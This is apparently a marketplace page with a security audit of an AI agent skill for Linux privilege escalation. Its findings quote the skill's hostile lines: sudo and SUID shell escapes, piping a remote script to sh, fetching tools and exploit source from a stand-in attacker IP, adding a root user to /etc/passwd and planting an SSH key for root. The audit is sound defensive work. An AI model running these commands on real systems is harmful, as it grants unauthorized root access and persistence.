privilege-escalation-knowledge
Provides comprehensive methodologies for Linux privilege escalation, covering enumeration and exploitation techniques for security professionals.
Install this skill
Security score
The privilege-escalation-knowledge skill was audited on Mar 1, 2026 and we found 34 security issues across 4 threat categories, including 1 critical. Review the findings below before installing.
Categories Tested
Security Issues
Direct command execution function call
| 151 | # - python: sudo python -c 'import pty;pty.spawn("/bin/bash")' |
Piping content to sh shell
| 132 | curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh |
System command execution
| 149 | # - awk: sudo awk 'BEGIN {system("/bin/sh")}' |
System command execution
| 181 | /usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")' |
System command execution
| 203 | /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' |
Python os.system command execution
| 181 | /usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")' |
Python os.system command execution
| 203 | /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' |
Curl to non-GitHub URL
| 117 | curl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh |
Wget to non-GitHub URL
| 115 | wget http://YOUR_IP:8000/linpeas.sh |
Wget to non-GitHub URL
| 278 | wget http://YOUR_IP:8000/dirtypipe.c |
Access to /etc/passwd
| 209 | ### 4. Writable /etc/passwd |
Access to /etc/passwd
| 212 | # Check if /etc/passwd is writable |
Access to /etc/passwd
| 213 | ls -la /etc/passwd |
Access to /etc/passwd
| 216 | echo 'hacker:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd |
Access to /etc/passwd
| 219 | echo 'hacker::0:0:root:/root:/bin/bash' >> /etc/passwd |
Access to /etc/passwd
| 465 | ls -la /etc/shadow /etc/passwd |
Access to /etc/shadow
| 465 | ls -la /etc/shadow /etc/passwd |
Access to hidden dotfiles in home directory
| 310 | cat ~/.bash_history |
Access to root home directory
| 92 | ls -la /root/ |
Access to root home directory
| 380 | mkdir -p /root/.ssh |
Access to root home directory
| 381 | echo 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys |
Access to root home directory
| 382 | chmod 600 /root/.ssh/authorized_keys |
Access to root home directory
| 391 | cat /root/root.txt |
Access to root home directory
| 392 | cat /root/flag.txt |
Access to root home directory
| 403 | cat /root/root.txt | wc -c # Should be 33 (32 + newline) |
Access to root home directory
| 404 | cat /root/root.txt | grep -E '^[a-f0-9]{32}$' |
Access to root home directory
| 411 | ROOT_FLAG=$(cat /root/root.txt) |
Access to root home directory
| 547 | # cat /root/root.txt |
Access to SSH directory
| 381 | echo 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys |
Access to SSH directory
| 382 | chmod 600 /root/.ssh/authorized_keys |
External URL reference
| 67 | - GTFOBins (https://gtfobins.github.io/) - SUID/sudo exploitation |
External URL reference
| 115 | wget http://YOUR_IP:8000/linpeas.sh |
External URL reference
| 117 | curl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh |
External URL reference
| 278 | wget http://YOUR_IP:8000/dirtypipe.c |